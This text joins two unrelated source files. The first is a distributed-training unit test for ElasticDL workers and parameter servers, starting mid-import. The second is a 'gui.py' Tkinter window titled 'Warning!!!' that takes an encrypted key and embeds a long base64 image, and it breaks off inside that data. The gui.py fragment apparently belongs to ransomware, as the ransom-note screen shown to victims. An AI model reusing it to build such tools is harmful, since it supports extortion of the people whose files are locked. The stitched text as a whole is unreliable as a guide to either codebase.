from elasticdl.python.common.model_utils import get_model_spec
from elasticdl.python.ps.embedding_table import EmbeddingTable
from elasticdl.python.tests.test_utils import (
create_pserver,
get_frappe_dataset,
get_mnist_dataset,
get_random_batch,
)
from elasticdl.python.worker.worker import Worker
class WorkerPSInteractionTest(unittest.TestCase):
def setUp(self):
self._model_zoo_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "../../../model_zoo"
)
self._batch_size = 16
self._channels = []
self._pservers = []
self._workers = []
def tearDown(self):
for pserver in self._pservers:
pserver.server.stop(0)
def _create_pserver(self, model_def, num):
self._ports, self._channels, self._pservers = create_pserver(
self._model_zoo_path,
model_def,
grads_to_wait=1,
use_async=True,
num_ps_pods=num,
)
self._model_def = model_def
def _reset_pserver(self):
for ps in self._pservers:
ps.parameters.reset()
def _create_worker(self, worker_num):
for i in range(worker_num):
tf.keras.backend.clear_session()
tf.random.set_seed(22)
arguments = [
"--worker_id",
i,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
self._model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
worker = Worker(args, ps_channels=self._channels)
self._workers.append(worker)
def _worker_train(
self, worker_id, train_db, test_db, stop_step, use_tf_function=False
):
worker = self._workers[worker_id]
acc_meter = tf.keras.metrics.Accuracy()
worker_results = []
for step, (x, y) in enumerate(train_db):
if step == 0:
worker._run_model_call_before_training(x)
worker.get_model()
if use_tf_function:
w_loss, w_grads = worker.training_process_with_acceleration(
x, y
)
else:
w_loss, w_grads = worker.training_process_eagerly(x, y)
worker.report_gradient(w_grads)
if step % 20 == 0:
worker.get_model()
for (x, y) in test_db:
out = worker.forward_process(x)
if "mnist" in self._model_def:
acc_meter.update_state(tf.argmax(out, axis=1), y)
else:
out["probs"] = tf.reshape(out["probs"], [-1])
acc_meter.update_state(
tf.where(
out["probs"] < 0.5,
x=tf.zeros_like(y),
y=tf.ones_like(y),
),
y,
)
worker_results.append(
(float(w_loss.numpy()), float(acc_meter.result().numpy()))
)
acc_meter.reset_states()
if step > stop_step:
break
return worker_results
def _test_deepfm_train(self, num_ps, num_worker, stop_step):
model_def = "deepfm_functional_api.deepfm_functional_api.custom_model"
self._create_pserver(model_def, num_ps)
db, test_db = get_frappe_dataset(self._batch_size)
self._create_worker(num_worker)
threads = []
for w in range(num_worker):
t = Thread(
target=self._worker_train, args=(w, db, test_db, stop_step)
)
t.start()
threads.append(t)
for t in threads:
t.join()
def test_worker_pull_embedding(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
self._create_pserver(model_def, 2)
arguments = [
"--worker_id",
0,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
worker = Worker(args, ps_channels=self._channels)
# Test lookup embedding vectors that do not exist
layers = ["test-2", "test-2-slot"]
ids = [3, 5, 1, 6, 10, 2, 1, 2, 4, 7, 9]
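        # (Each embedding id is routed to a pserver by int_to_id(id, num_ps); the
        #  expected values are later gathered per-id from the owning pserver's table,
        #  presumably mirroring how the worker shards its lookups.)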
embedding_table_args = [
(layers[0], 8, "uniform", False),
(layers[1], 8, 3.3, True),
]
# initialize embedding table object
for pserver in self._pservers:
for layer, table_args in zip(layers, embedding_table_args):
pserver.parameters.embedding_params[layer] = EmbeddingTable(
*table_args
)
result_dict = {}
for layer in layers:
embedding = worker.pull_embedding_vectors(layer, ids)
result_dict[layer] = embedding
for layer in layers:
expected_result = []
for embedding_id in ids:
ps_id = int_to_id(embedding_id, len(self._pservers))
table = self._pservers[ps_id].parameters.embedding_params[
layer
]
expected_result.append(table.get([embedding_id]))
expected_result = np.concatenate(expected_result)
self.assertTrue(np.allclose(expected_result, result_dict[layer]))
def test_compare_onebatch_train(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
self._create_pserver(model_def, 2)
images, labels = get_random_batch(self._batch_size)
# TODO(yunjian.lmh): test optimizer wrapper
arguments = [
"--worker_id",
0,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
worker = Worker(args, ps_channels=self._channels)
worker._run_model_call_before_training(images)
worker.get_model()
w_loss, w_grads = worker.training_process_eagerly(images, labels)
worker.report_gradient(w_grads)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
(
model,
dataset_fn,
loss_fn,
opt_fn,
eval_metrics_fn,
prediction_outputs_processor,
create_data_reader_fn,
callback_list,
) = get_model_spec(
model_zoo=self._model_zoo_path,
model_def=model_def,
dataset_fn="dataset_fn",
model_params=None,
loss="loss",
optimizer="optimizer",
eval_metrics_fn="eval_metrics_fn",
prediction_outputs_processor="PredictionOutputsProcessor",
custom_data_reader="custom_data_reader",
callbacks="callbacks",
)
with tf.GradientTape() as tape:
output = model.call(images, training=True)
labels = tf.reshape(labels, [-1])
loss = loss_fn(labels, output)
grads = tape.gradient(loss, model.trainable_variables)
opt_fn().apply_gradients(zip(grads, model.trainable_variables))
for v in model.trainable_variables:
ps_id = string_to_id(v.name, len(self._channels))
ps_v = self._pservers[ps_id].parameters.get_non_embedding_param(
v.name
)
np.testing.assert_array_equal(ps_v.numpy(), v.numpy())
def test_compare_mnist_train(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
self._create_pserver(model_def, 2)
db, test_db = get_mnist_dataset(self._batch_size)
stop_step = 20
self._create_worker(1)
worker_results = self._worker_train(
0, train_db=db, test_db=test_db, stop_step=stop_step
)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
acc_meter = tf.keras.metrics.Accuracy()
(
model,
dataset_fn,
loss_fn,
opt_fn,
eval_metrics_fn,
prediction_outputs_processor,
create_data_reader_fn,
callbacks_list,
) = get_model_spec(
model_zoo=self._model_zoo_path,
model_def=model_def,
dataset_fn="dataset_fn",
model_params=None,
loss="loss",
optimizer="optimizer",
eval_metrics_fn="eval_metrics_fn",
prediction_outputs_processor="PredictionOutputsProcessor",
custom_data_reader="custom_data_reader",
callbacks="callbacks",
)
local_results = []
for step, (x, y) in enumerate(db):
with tf.GradientTape() as tape:
out = model.call(x, training=True)
ll = loss_fn(y, out)
grads = tape.gradient(ll, model.trainable_variables)
opt_fn().apply_gradients(zip(grads, model.trainable_variables))
if step % 20 == 0:
for (x, y) in test_db:
out = model.call(x, training=False)
acc_meter.update_state(tf.argmax(out, axis=1), y)
local_results.append(
(float(ll.numpy()), float(acc_meter.result().numpy()))
)
acc_meter.reset_states()
if step > stop_step:
break
for w, l in zip(worker_results, local_results):
self.assertTupleEqual(w, l)
def test_deepfm_train(self):
model_def = "deepfm_functional_api.deepfm_functional_api.custom_model"
self._create_pserver(model_def, 2)
db, test_db = get_frappe_dataset(self._batch_size)
self._create_worker(1)
worker_results = self._worker_train(
0, train_db=db, test_db=test_db, stop_step=100
)
acc = max([r[1] for r in worker_results])
self.assertLess(0.65, acc)
def test_deepfm_two_worker_train(self):
num_ps = 2
num_worker = 2
stop_step = 10
self._test_deepfm_train(num_ps, num_worker, stop_step)
def test_deepfm_four_worker_train(self):
num_ps = 4
num_worker = 1
stop_step = 10
self._test_deepfm_train(num_ps, num_worker, stop_step)
def test_restart_ps(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
num_data = 8
training_data = [
get_random_batch(self._batch_size) for _ in range(num_data)
]
workers = []
self._create_pserver(model_def, 2)
for w in range(2):
self._reset_pserver()
arguments = [
"--worker_id",
0,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
worker = Worker(args, ps_channels=self._channels)
workers.append(worker)
worker._run_model_call_before_training(training_data[0][0])
for i in range(num_data):
worker.get_model()
w_loss, w_grads = worker.training_process_eagerly(
training_data[i][0], training_data[i][1]
)
worker.report_gradient(w_grads)
if w == 1 and i == 3:
# Restart ps for the 2nd worker at i==3
# self._restart_pserver(model_def)
self._reset_pserver()
# `report_variable` will be called in `get_model` to
# initialize variables on ps with worker variables
worker.get_model()
# send the grads again as these grads are not applied
# on worker variables
worker.report_gradient(w_grads)
for var_name in workers[0]._non_embed_vars:
np.testing.assert_array_equal(
workers[0]._non_embed_vars[var_name].numpy(),
workers[1]._non_embed_vars[var_name].numpy(),
)
def test_train_acceleration_with_embedding(self):
model_def = "deepfm_functional_api.deepfm_functional_api.custom_model"
self._create_pserver(model_def, 2)
db, test_db = get_frappe_dataset(self._batch_size)
self._create_worker(1)
worker_results = self._worker_train(
0,
train_db=db,
test_db=test_db,
stop_step=100,
use_tf_function=True,
)
acc = max([r[1] for r in worker_results])
self.assertLess(0.65, acc)
if __name__ == "__main__":
    unittest.main()
|
gui.py
|
from tkinter import *
from tkinter.ttk import *
import os
import threading
import time
class mainwindow(Tk):
def __init__(self, encrypted_key_b64):
Tk.__init__(self)
self.title(string="Warning!!!") # Set window title
self.resizable(0, 0) # Do not allow to be resized
self.configure(background='black')
# self.overrideredirect(True)
self.style = Style()
self.style.theme_use("clam")
self.encrypted_key_b64 = encrypted_key_b64
photo_code = '''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
